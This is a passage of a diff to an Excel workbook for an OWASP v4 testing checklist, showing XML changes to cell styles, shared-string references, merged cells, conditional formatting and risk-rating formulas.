         <v>123</v>
@@ -4883,7 +4883,7 @@
         <v>370</v>
       </c>
       <c r="D49" s="44" t="s">
-        <v>466</v>
+        <v>465</v>
       </c>
       <c r="E49" s="24" t="s">
         <v>123</v>
@@ -4900,7 +4900,7 @@
         <v>109</v>
       </c>
       <c r="D50" s="44" t="s">
-        <v>466</v>
+        <v>465</v>
       </c>
       <c r="E50" s="24" t="s">
         <v>123</v>
@@ -5591,7 +5591,7 @@
         <v>411</v>
       </c>
       <c r="D93" s="44" t="s">
-        <v>467</v>
+        <v>466</v>
       </c>
       <c r="E93" s="24" t="s">
         <v>123</v>
@@ -5609,7 +5609,7 @@
         <v>412</v>
       </c>
       <c r="D94" s="44" t="s">
-        <v>467</v>
+        <v>466</v>
       </c>
       <c r="E94" s="24" t="s">
         <v>123</v>
@@ -5976,7 +5976,7 @@
         <v>429</v>
       </c>
       <c r="D116" s="44" t="s">
-        <v>468</v>
+        <v>467</v>
       </c>
       <c r="E116" s="38" t="s">
         <v>123</v>
@@ -6012,7 +6012,7 @@
         <v>432</v>
       </c>
       <c r="D118" s="44" t="s">
-        <v>468</v>
+        <v>467</v>
       </c>
       <c r="E118" s="38" t="s">
         <v>123</v>
@@ -6819,19 +6819,19 @@
     </row>
   </sheetData>
   <conditionalFormatting sqref="G2">
-    <cfRule type="cellIs" dxfId="17" priority="6" operator="equal">
+    <cfRule type="cellIs" dxfId="15" priority="6" operator="equal">
       <formula>"Low"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="16" priority="7" operator="equal">
+    <cfRule type="cellIs" dxfId="14" priority="7" operator="equal">
       <formula>"Critical"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="15" priority="8" operator="equal">
+    <cfRule type="cellIs" dxfId="13" priority="8" operator="equal">
       <formula>"Note"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="14" priority="9" operator="equal">
+    <cfRule type="cellIs" dxfId="12" priority="9" operator="equal">
       <formula>"Moderate"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="13" priority="10" operator="equal">
+    <cfRule type="cellIs" dxfId="11" priority="10" operator="equal">
       <formula>"High"</formula>
     </cfRule>
   </conditionalFormatting>
@@ -6859,28 +6859,28 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.35">
-      <c r="A1" s="58" t="s">
+      <c r="A1" s="54" t="s">
         <v>8</v>
       </c>
-      <c r="B1" s="58"/>
-      <c r="C1" s="58"/>
-      <c r="D1" s="58"/>
-      <c r="E1" s="58"/>
-      <c r="F1" s="58"/>
-      <c r="G1" s="58"/>
+      <c r="B1" s="54"/>
+      <c r="C1" s="54"/>
+      <c r="D1" s="54"/>
+      <c r="E1" s="54"/>
+      <c r="F1" s="54"/>
+      <c r="G1" s="54"/>
     </row>
     <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A3" s="59" t="s">
+      <c r="A3" s="55" t="s">
         <v>9</v>
       </c>
-      <c r="B3" s="59"/>
-      <c r="C3" s="59"/>
-      <c r="D3" s="59"/>
+      <c r="B3" s="55"/>
+      <c r="C3" s="55"/>
+      <c r="D3" s="55"/>
       <c r="E3" s="2"/>
-      <c r="F3" s="59" t="s">
+      <c r="F3" s="55" t="s">
         <v>10</v>
       </c>
-      <c r="G3" s="59"/>
+      <c r="G3" s="55"/>
       <c r="I3" t="s">
         <v>11</v>
       </c>
@@ -6889,27 +6889,27 @@
       </c>
     </row>
     <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A4" s="60" t="s">
+      <c r="A4" s="56" t="s">
         <v>13</v>
       </c>
-      <c r="B4" s="60"/>
-      <c r="C4" s="60"/>
-      <c r="D4" s="60"/>
+      <c r="B4" s="56"/>
+      <c r="C4" s="56"/>
+      <c r="D4" s="56"/>
       <c r="E4" s="3"/>
-      <c r="F4" s="60" t="s">
+      <c r="F4" s="56" t="s">
         <v>14</v>
       </c>
-      <c r="G4" s="60"/>
+      <c r="G4" s="56"/>
     </row>
     <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A5" s="4" t="s">
         <v>15</v>
       </c>
-      <c r="B5" s="55" t="s">
+      <c r="B5" s="51" t="s">
         <v>61</v>
       </c>
-      <c r="C5" s="56"/>
-      <c r="D5" s="56"/>
+      <c r="C5" s="52"/>
+      <c r="D5" s="52"/>
       <c r="E5" s="5">
         <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
         <v>3</v>
@@ -6929,11 +6929,11 @@
       <c r="A6" s="4" t="s">
         <v>19</v>
       </c>
-      <c r="B6" s="63" t="s">
+      <c r="B6" s="59" t="s">
         <v>62</v>
       </c>
-      <c r="C6" s="63"/>
-      <c r="D6" s="63"/>
+      <c r="C6" s="59"/>
+      <c r="D6" s="59"/>
       <c r="E6" s="5">
         <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
         <v>4</v>
@@ -6953,11 +6953,11 @@
       <c r="A7" s="4" t="s">
         <v>23</v>
       </c>
-      <c r="B7" s="63" t="s">
+      <c r="B7" s="59" t="s">
         <v>56</v>
       </c>
-      <c r="C7" s="63"/>
-      <c r="D7" s="63"/>
+      <c r="C7" s="59"/>
+      <c r="D7" s="59"/>
       <c r="E7" s="5">
         <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
         <v>0</v>
@@ -6977,11 +6977,11 @@
       <c r="A8" s="4" t="s">
         <v>27</v>
       </c>
-      <c r="B8" s="63" t="s">
+      <c r="B8" s="59" t="s">
         <v>28</v>
       </c>
-      <c r="C8" s="63"/>
-      <c r="D8" s="63"/>
+      <c r="C8" s="59"/>
+      <c r="D8" s="59"/>
       <c r="E8" s="5">
         <f>VLOOKUP(B8,References!G3:H8,2,FALSE)</f>
         <v>2</v>
@@ -7008,28 +7008,28 @@
       <c r="H9" s="7"/>
     </row>
     <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A10" s="60" t="s">
+      <c r="A10" s="56" t="s">
         <v>31</v>
       </c>
-      <c r="B10" s="60"/>
-      <c r="C10" s="60"/>
-      <c r="D10" s="60"/>
+      <c r="B10" s="56"/>
+      <c r="C10" s="56"/>
+      <c r="D10" s="56"/>
       <c r="E10" s="3"/>
-      <c r="F10" s="60" t="s">
+      <c r="F10" s="56" t="s">
         <v>32</v>
       </c>
-      <c r="G10" s="60"/>
+      <c r="G10" s="56"/>
       <c r="H10" s="3"/>
     </row>
     <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A11" s="4" t="s">
         <v>33</v>
       </c>
-      <c r="B11" s="54" t="s">
+      <c r="B11" s="60" t="s">
         <v>59</v>
       </c>
-      <c r="C11" s="54"/>
-      <c r="D11" s="54"/>
+      <c r="C11" s="60"/>
+      <c r="D11" s="60"/>
       <c r="E11" s="5">
         <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
         <v>1</v>
@@ -7049,11 +7049,11 @@
       <c r="A12" s="4" t="s">
         <v>37</v>
       </c>
-      <c r="B12" s="54" t="s">
+      <c r="B12" s="60" t="s">
         <v>70</v>
       </c>
-      <c r="C12" s="54"/>
-      <c r="D12" s="54"/>
+      <c r="C12" s="60"/>
+      <c r="D12" s="60"/>
       <c r="E12" s="5">
         <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
         <v>5</v>
@@ -7073,11 +7073,11 @@
       <c r="A13" s="4" t="s">
         <v>40</v>
       </c>
-      <c r="B13" s="54" t="s">
+      <c r="B13" s="60" t="s">
         <v>64</v>
       </c>
-      <c r="C13" s="54"/>
-      <c r="D13" s="54"/>
+      <c r="C13" s="60"/>
+      <c r="D13" s="60"/>
       <c r="E13" s="5">
         <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
         <v>4</v>
@@ -7097,11 +7097,11 @@
       <c r="A14" s="4" t="s">
         <v>44</v>
       </c>
-      <c r="B14" s="54" t="s">
+      <c r="B14" s="60" t="s">
         <v>65</v>
       </c>
-      <c r="C14" s="54"/>
-      <c r="D14" s="54"/>
+      <c r="C14" s="60"/>
+      <c r="D14" s="60"/>
       <c r="E14" s="5">
         <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
         <v>3</v>
@@ -7121,51 +7121,51 @@
       <c r="E15" s="4"/>
     </row>
     <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.25">
-      <c r="A16" s="61" t="s">
+      <c r="A16" s="57" t="s">
         <v>48</v>
       </c>
-      <c r="B16" s="57">
+      <c r="B16" s="53">
         <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
         <v>2.75</v>
       </c>
-      <c r="C16" s="57"/>
-      <c r="D16" s="57"/>
+      <c r="C16" s="53"/>
+      <c r="D16" s="53"/>
       <c r="E16" s="4"/>
-      <c r="F16" s="62" t="s">
+      <c r="F16" s="58" t="s">
         <v>49</v>
       </c>
-      <c r="G16" s="57">
+      <c r="G16" s="53">
         <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
         <v>2.625</v>
       </c>
     </row>
     <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A17" s="61"/>
-      <c r="B17" s="57"/>
-      <c r="C17" s="57"/>
-      <c r="D17" s="57"/>
-      <c r="F17" s="62"/>
-      <c r="G17" s="57"/>
+      <c r="A17" s="57"/>
+      <c r="B17" s="53"/>
+      <c r="C17" s="53"/>
+      <c r="D17" s="53"/>
+      <c r="F17" s="58"/>
+      <c r="G17" s="53"/>
     </row>
     <row r="20" spans="1:7" ht="18.75" x14ac:dyDescent="0.3">
-      <c r="B20" s="51" t="s">
+      <c r="B20" s="61" t="s">
         <v>50</v>
       </c>
-      <c r="C20" s="51"/>
-      <c r="D20" s="51"/>
-      <c r="E20" s="52" t="str">
+      <c r="C20" s="61"/>
+      <c r="D20" s="61"/>
+      <c r="E20" s="62" t="str">
         <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
         <v>Note</v>
       </c>
-      <c r="F20" s="52"/>
+      <c r="F20" s="62"/>
       <c r="G20" s="1"/>
     </row>
     <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.25">
-      <c r="B22" s="53" t="s">
+      <c r="B22" s="63" t="s">
         <v>51</v>
       </c>
-      <c r="C22" s="53"/>
-      <c r="D22" s="53"/>
+      <c r="C22" s="63"/>
+      <c r="D22" s="63"/>
     </row>
     <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.25">
       <c r="A23" s="9" t="s">
@@ -7244,6 +7244,12 @@
   </sheetData>
   <dataConsolidate function="varp"/>
   <mergeCells count="22">
+    <mergeCell ref="B20:D20"/>
+    <mergeCell ref="E20:F20"/>
+    <mergeCell ref="B22:D22"/>
+    <mergeCell ref="B12:D12"/>
+    <mergeCell ref="B13:D13"/>
+    <mergeCell ref="B14:D14"/>
     <mergeCell ref="B5:D5"/>
     <mergeCell ref="B16:D17"/>
     <mergeCell ref="G16:G17"/>
@@ -7260,58 +7266,52 @@
     <mergeCell ref="A10:D10"/>
     <mergeCell ref="F10:G10"/>
     <mergeCell ref="B11:D11"/>
-    <mergeCell ref="B20:D20"/>
-    <mergeCell ref="E20:F20"/>
-    <mergeCell ref="B22:D22"/>
-    <mergeCell ref="B12:D12"/>
-    <mergeCell ref="B13:D13"/>
-    <mergeCell ref="B14:D14"/>
   </mergeCells>
   <phoneticPr fontId="5" type="noConversion"/>
   <conditionalFormatting sqref="E20:F20">
-    <cfRule type="containsText" dxfId="12" priority="7" operator="containsText" text="critical">
+    <cfRule type="containsText" dxfId="10" priority="7" operator="containsText" text="critical">
       <formula>NOT(ISERROR(SEARCH("critical",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="11" priority="8" operator="containsText" text="high">
+    <cfRule type="containsText" dxfId="9" priority="8" operator="containsText" text="high">
       <formula>NOT(ISERROR(SEARCH("high",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="10" priority="9" operator="containsText" text="moderate">
+    <cfRule type="containsText" dxfId="8" priority="9" operator="containsText" text="moderate">
       <formula>NOT(ISERROR(SEARCH("moderate",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="9" priority="10" operator="containsText" text="low">
+    <cfRule type="containsText" dxfId="7" priority="10" operator="containsText" text="low">
       <formula>NOT(ISERROR(SEARCH("low",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="8" priority="11" operator="containsText" text="Note">
+    <cfRule type="containsText" dxfId="6" priority="11" operator="containsText" text="Note">
       <formula>NOT(ISERROR(SEARCH("Note",E20)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="A24:A26 B23:D23">
-    <cfRule type="containsText" dxfId="7" priority="6" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="5" priority="6" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B23:D26 A24:A26">
-    <cfRule type="containsText" dxfId="6" priority="5" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="4" priority="5" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="C26">
-    <cfRule type="containsText" dxfId="5" priority="4" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="3" priority="4" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",C26)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="D25">
-    <cfRule type="containsText" dxfId="4" priority="3" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="2" priority="3" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",D25)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="C25">
-    <cfRule type="containsText" dxfId="3" priority="2" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",C25)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B26">
-    <cfRule type="containsText" dxfId="2" priority="1" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="0" priority="1" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",B26)))</formula>
     </cfRule>
   </conditionalFormatting>

--- a/OWASPv4_Checklist.xlsx
+++ b/OWASPv4_Checklist.xlsx
@@ -5,11 +5,11 @@
   <workbookPr defaultThemeVersion="124226"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\GIT\OWASP-Testing-Checklist\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\pphongthiproek\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
-    <workbookView xWindow="120" yWindow="465" windowWidth="22740" windowHeight="12735" activeTab="2"/>
+    <workbookView xWindow="120" yWindow="465" windowWidth="22740" windowHeight="12735" activeTab="3"/>
   </bookViews>
   <sheets>
     <sheet name="Testing Checklist" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
     <definedName name="result">'Testing Checklist'!$A$128:$A$130</definedName>
     <definedName name="SkillRequired">References!$A$3:$A$8</definedName>
   </definedNames>
-  <calcPr calcId="152511" concurrentCalc="0"/>
+  <calcPr calcId="152511"/>
   <extLst>
     <ext xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" uri="{7523E5D3-25F3-A5E0-1632-64F254C22452}">
       <mx:ArchID Flags="2"/>
@@ -4082,8 +4082,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:F130"/>
   <sheetViews>
-    <sheetView showGridLines="0" topLeftCell="A76" workbookViewId="0">
-      <selection activeCell="C80" sqref="C80"/>
+    <sheetView showGridLines="0" workbookViewId="0">
+      <selection activeCell="A5" sqref="A5"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
@@ -6836,8 +6836,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:J26"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
-      <selection activeCell="E8" sqref="E8"/>
+    <sheetView workbookViewId="0">
+      <selection activeCell="G6" sqref="G6"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
@@ -6935,11 +6935,11 @@
         <v>21</v>
       </c>
       <c r="G6" s="6" t="s">
-        <v>88</v>
+        <v>102</v>
       </c>
       <c r="H6" s="7">
-        <f>VLOOKUP(G6,References!C$11:D$16,2,FALSE)</f>
-        <v>3</v>
+        <f>VLOOKUP(G6,References!C$11:D$17,2,FALSE)</f>
+        <v>9</v>
       </c>
     </row>
     <row r="7" spans="1:10" ht="15" x14ac:dyDescent="0.25">
@@ -7129,7 +7129,7 @@
       </c>
       <c r="G16" s="53">
         <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
-        <v>2.625</v>
+        <v>3.375</v>
       </c>
     </row>
     <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.2">
@@ -7148,7 +7148,7 @@
       <c r="D20" s="61"/>
       <c r="E20" s="62" t="str">
         <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
-        <v>Note</v>
+        <v>Low</v>
       </c>
       <c r="F20" s="62"/>
       <c r="G20" s="1"/>
@@ -7166,11 +7166,11 @@
       </c>
       <c r="B23" s="1" t="str">
         <f>IF($G16&lt;3,"-&gt;Low&lt;-","Low")</f>
-        <v>-&gt;Low&lt;-</v>
+        <v>Low</v>
       </c>
       <c r="C23" s="1" t="str">
         <f>IF(AND($G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
-        <v>Moderate</v>
+        <v>-&gt;Moderate&lt;-</v>
       </c>
       <c r="D23" s="1" t="str">
         <f>IF($G16&gt;=6,"-&gt;High&lt;-","High")</f>
@@ -7185,11 +7185,11 @@
       </c>
       <c r="B24" s="12" t="str">
         <f>IF(AND($B$16&lt;3,$G$16&lt;3),"-&gt;Note&lt;-","Note")</f>
-        <v>-&gt;Note&lt;-</v>
+        <v>Note</v>
       </c>
       <c r="C24" s="13" t="str">
         <f>IF(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),"-&gt;Low&lt;-","Low")</f>
-        <v>Low</v>
+        <v>-&gt;Low&lt;-</v>
       </c>
       <c r="D24" s="14" t="str">
         <f>IF(AND($B16&lt;3,$G16&gt;=6),"-&gt;Moderate&lt;-","Moderate")</f>
@@ -7369,7 +7369,7 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:P17"/>
   <sheetViews>
-    <sheetView topLeftCell="F1" workbookViewId="0">
+    <sheetView tabSelected="1" topLeftCell="B1" workbookViewId="0">
       <selection activeCell="G2" sqref="G2"/>
     </sheetView>
   </sheetViews>

--- a/OWASPv4_Checklist.xlsx
+++ b/OWASPv4_Checklist.xlsx
@@ -1,15 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="4" rupBuild="14420"/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="4" rupBuild="10715"/>
   <workbookPr defaultThemeVersion="124226"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\pphongthiproek\Downloads\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/zeq3ul/Downloads/"/>
     </mc:Choice>
   </mc:AlternateContent>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3CC3F362-5CFA-DB44-85FA-72567691BB14}" xr6:coauthVersionLast="43" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="120" yWindow="465" windowWidth="22740" windowHeight="12735" activeTab="3"/>
+    <workbookView xWindow="7340" yWindow="520" windowWidth="22740" windowHeight="12740" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Testing Checklist" sheetId="1" r:id="rId1"/>
@@ -36,8 +37,14 @@
     <definedName name="result">'Testing Checklist'!$A$128:$A$130</definedName>
     <definedName name="SkillRequired">References!$A$3:$A$8</definedName>
   </definedNames>
-  <calcPr calcId="152511"/>
+  <calcPr calcId="191029"/>
   <extLst>
+    <ext xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures" uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}">
+      <xcalcf:calcFeatures>
+        <xcalcf:feature name="microsoft.com:RD"/>
+        <xcalcf:feature name="microsoft.com:FV"/>
+      </xcalcf:calcFeatures>
+    </ext>
     <ext xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" uri="{7523E5D3-25F3-A5E0-1632-64F254C22452}">
       <mx:ArchID Flags="2"/>
     </ext>
@@ -46,13 +53,13 @@
 </file>
 
 <file path=xl/comments1.xml><?xml version="1.0" encoding="utf-8"?>
-<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr">
   <authors>
     <author>its02</author>
     <author>pphongthiproek</author>
   </authors>
   <commentList>
-    <comment ref="A5" authorId="0" shapeId="0">
+    <comment ref="A5" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0200-000001000000}">
       <text>
         <r>
           <rPr>
@@ -66,7 +73,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F5" authorId="1" shapeId="0">
+    <comment ref="F5" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000002000000}">
       <text>
         <r>
           <rPr>
@@ -80,7 +87,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A6" authorId="0" shapeId="0">
+    <comment ref="A6" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0200-000003000000}">
       <text>
         <r>
           <rPr>
@@ -94,7 +101,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F6" authorId="1" shapeId="0">
+    <comment ref="F6" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000004000000}">
       <text>
         <r>
           <rPr>
@@ -108,7 +115,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A7" authorId="1" shapeId="0">
+    <comment ref="A7" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000005000000}">
       <text>
         <r>
           <rPr>
@@ -122,7 +129,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F7" authorId="1" shapeId="0">
+    <comment ref="F7" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000006000000}">
       <text>
         <r>
           <rPr>
@@ -136,7 +143,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A8" authorId="1" shapeId="0">
+    <comment ref="A8" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000007000000}">
       <text>
         <r>
           <rPr>
@@ -150,7 +157,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F8" authorId="1" shapeId="0">
+    <comment ref="F8" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000008000000}">
       <text>
         <r>
           <rPr>
@@ -164,7 +171,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A11" authorId="1" shapeId="0">
+    <comment ref="A11" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000009000000}">
       <text>
         <r>
           <rPr>
@@ -178,7 +185,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F11" authorId="1" shapeId="0">
+    <comment ref="F11" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-00000A000000}">
       <text>
         <r>
           <rPr>
@@ -192,7 +199,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A12" authorId="1" shapeId="0">
+    <comment ref="A12" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-00000B000000}">
       <text>
         <r>
           <rPr>
@@ -206,7 +213,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F12" authorId="1" shapeId="0">
+    <comment ref="F12" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-00000C000000}">
       <text>
         <r>
           <rPr>
@@ -220,7 +227,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A13" authorId="1" shapeId="0">
+    <comment ref="A13" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-00000D000000}">
       <text>
         <r>
           <rPr>
@@ -234,7 +241,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F13" authorId="1" shapeId="0">
+    <comment ref="F13" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-00000E000000}">
       <text>
         <r>
           <rPr>
@@ -248,7 +255,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A14" authorId="1" shapeId="0">
+    <comment ref="A14" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-00000F000000}">
       <text>
         <r>
           <rPr>
@@ -262,13 +269,13 @@
         </r>
       </text>
     </comment>
-    <comment ref="F14" authorId="1" shapeId="0">
+    <comment ref="F14" authorId="1" shapeId="0" xr:uid="{00000000-0006-0000-0200-000010000000}">
       <text>
         <r>
           <rPr>
             <b/>
             <sz val="9"/>
-            <color indexed="81"/>
+            <color rgb="FF000000"/>
             <rFont val="Tahoma"/>
             <family val="2"/>
           </rPr>
@@ -281,7 +288,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="745" uniqueCount="465">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="744" uniqueCount="464">
   <si>
     <t>Information Gathering</t>
   </si>
@@ -332,9 +339,6 @@
